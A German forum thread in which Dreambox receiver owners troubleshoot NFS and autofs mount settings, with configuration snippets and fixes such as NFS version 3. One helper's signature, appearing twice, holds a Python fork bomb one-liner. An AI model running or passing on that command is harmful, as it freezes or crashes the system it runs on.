NFS Mount will nicht gehen...

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • NFS Mount will nicht gehen...

      Hey, ich hab im Netz nen Windows NFS Mount.
      Auf meiner DM800HDse läuft dieser Perfekt.... Nur auf der 820HD will es mit gleichen Einstellungen einfach nicht laufen..... :2Guns:
      Auf der 800HDse hab ich es einfach in die auto.network eingetippert und es geht... Wie läuft das bei der 820HD?
      Im Netzwerkbrowser Findet er zwar den WinServer, kann ihn jedoch nicht aufklappen... :-/

      Habe das hier auch schon Probiert doch leider ohne Erfolg...



      Edit: die Ordner werden im Network Mount angezeigt, gehe ich rein in den Ordner ist dieser leer.
      Eingetreagen habe ich in die auto.network:
      NAS-BluRay -fstype=nfs,rw,soft,tcp,nolock,rsize=32768,wsize=32768 192.168.178.10:/BluRay
      NAS-mp3 -fstype=nfs,rw,soft,tcp,nolock,rsize=32768,wsize=32768 192.168.178.10:/mp3
      NAS -fstype=nfs,rw,soft,tcp,nolock,rsize=32768,wsize=32768 192.168.178.10:/e


      Danke schon mal für eure Hilfe!

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von BoobFrog ()

    • hallo, ich habe das Image dreambox-image-deb-dm820-20_10_2015.tar.tar installiert.
      auch bei mir geht das NFS nicht,
      habe dann lokal versucht das Verzeichnis zu mounten wie es im automounts.xml aussieht,
      das ging nicht ->
      <?xml version="1.0" encoding="UTF-8"?>
      <mountmanager>
      <nfs>
      <mount>
      <active>True</active>
      <hdd_replacement>True</hdd_replacement>
      <ip>192.168.1.174</ip>
      <sharename>dreambox</sharename>
      <sharedir>export/hdd</sharedir>
      <options>rw,nolock,udp</options>
      </mount>
      </nfs>
      </mountmanager>

      aber so gings ...
      mount 192.168.1.174:/dreambox /mnt -o rw,nolock
      also mit tcp nicht mit udp
      im Mountmanager aber mit tcp gings auch nicht...
      Tips ?
    • Versuch mal per telnet

      Quellcode

      1. chmod 644 /etc/auto.network

      denn wenn diese datei auführbar ist gehts nicht und vergess den automounts.xml unsinn
      alternativ installiere den newnigma2-filebrowser da ist dann unter newnigma2 services der autofs editor mit dem kannste das anlegen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • So hatte die Box nun neu geflasht um sauber noch einmal anzufangen...

      Dann die 2 Zeilen geändert:
      #/media/net /etc/auto.network (etc/auto.master.d)
      /media/net auto.network --ghost (auto.master)
      Und in der auto.network das gleiche eingetragen wie in meiner DM800HDse (da läuft es)
      Nun hab ich das gleiche Problem wie am Anfang... Ordner sind im Media Player unter Network Mount da, gehe ich in einen Ordner rein ist dieser Leer...

      Wieso geht es auf der 800Se aber auf der 820HD nicht? -_-

      MfG
    • Über Telnet die Dateirecht vergeben habe ich am ende auch gemacht.

      Über den Filebrowser habe ich es versucht,hab ihn installiert und Box neugestartet.
      Es waren auch meine Einträge vorhanden.
      Dann hab ich auf Editieren gedrückt alles gelassen wie es ist und hinzufügen - Eintrag weg... oO
      Den anderen Eintrag rausgelöscht, Box neu gestartet und per Hand einen Eintrag hinzugefügt. Geht nicht Eintrag erscheint nicht in der Liste.

      Irgendwie Seltsam... gibt es ein log was man sich ansehen kann wieso der Mount nicht sauber durchläuft?
      Ist doch seltsam das er das Verzeichnis anlegt aber keinen Inhalt anzeigt.
    • Ich habe mit meiner Box das gleiche Problem, auf den Boxen mit OE 2.0 geht jeglicher Mount ob NFS oder CIFS.

      Nur meine 7080 mit OE 2,2 will mit dem mounten nicht..... :(
      Es gibt nichts gutes, ausser man tut es.......
    • Find es seltsam... Muss doch gehen?

      kati910 welches Image hast du denn drauf?
      Ich bin ja nicht der einzige bei dem es nicht geht... :-/ nen einfaches nfs sollte doch irgendwie machbar sein.... :-/

      Kann ich irgendwie noch infos irgendwie preisgeben log files oder so? Was wäre brauchbar oder nützlich?


      MfG
    • Default wird wohl immer NFS Version 4 genutzt. Das muss die gegenstelle auch können.
      Bei den Optionen "vers=3" mit angeben und es klappt.

      Ich habe eine Qnap NAS und mache nur NFS V3.
      Bilder
      • NFS-v3.jpg

        56,84 kB, 747×422, 811 mal angesehen
    • Ihr habe nichts editiert nur die rechte gestezt wie oben beschrieben und mein Plugin.
      Hier die screenshots es geht wunderbar eins vor und nach dem einschalten des servers.
      Bilder
      • screenshot.png

        53,46 kB, 1.920×1.080, 764 mal angesehen
      • screenshot1.png

        55,02 kB, 1.920×1.080, 641 mal angesehen
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ich habe meine DM8000 gegen eine DM7080 getauscht. Jetzt versuche ich, die 500HD aus dem Schlafzimmer wieder anzubinden, da ich mit autofs die HDD der 8000 als Aufnahmeplatte angebunden hatte und das jetzt auch wieder mit der 7080 versuche, bekomme aber den mount nicht hin.

      Auf der 7080 (192.168.178.16) habe ich eine /etc/exports mit

      Quellcode

      1. /media/hdd/ *(rw,async,no_subtree_check,root_squash)


      Auf der 500HD sieht meine /etc/auto.network so aus

      Quellcode

      1. # automatically generated by enigma 2
      2. # do NOT change manually!
      3. Filme -fstype=nfs,rw,soft,nolock 192.168.178.10:/Filme_Dreambox
      4. Sic -fstype=nfs,rw,soft,nolock 192.168.178.10:/Sic
      5. Sonstiges -fstype=nfs,rw,soft,nolock 192.168.178.10:/Sonstiges
      6. Plugins -fstype=nfs,rw,soft,nolock 192.168.178.10:/Plugins
      7. hdd -fstype=nfs,rw,soft,nolock,vers=3 192.168.178.16:/media/hdd


      Die Qnapfreigaben werden problemlos gemountet, unter /media/net wird auch das Verzeichnis hdd angelegt, wenn ich aber in Filezilla mit ftp darauf zugreifen möchte, kommt

      Quellcode

      1. Befehl: CWD hdd
      2. Antwort: 550 Failed to change directory.
      3. Fehler: Verzeichnisinhalt konnte nicht empfangen werden


      Was habe ich da übersehen oder vergessen?
    • Mir ist inzwischen aufgefallen, dass mir unter Windows die Platte der dm7080 angezeigt wird. Kann ja dann nur eine Standard-CIFS-Freigabe sein.

      Ich habe dann mal auf der dm7080 den nfs-editor installiert und die Platte und die Verzeichnisse der Picons als Freigabe gespeichert, steht auch alles in der /etc/exports.
      Im Netzwerbrowser der 500HD wird mir auch die 7080 mit der CIFS-Freigabe der HDD angezeigt, aber keine NFS-Freigaben.

      Funktionieren die NFS-Freigaben unter OE2.2 anders? Bin ratlos.
    • Danke @hmich für den Hinweis. Ich habe jetzt auf der DM 7080 umgestellt, der Unterschied war ja nur, dass das "/media/net /etc/auto.network --ghost" statt in der /etc/auto.master in der /etc/auto.master.d/enigma2.autofs steht. Funktioniert beides.

      Aber mein Problem ist ja, dass ich auf einer OE2.0 Clientbox keinen Zugriff auf eine NFS-Freigabe der 7080 habe.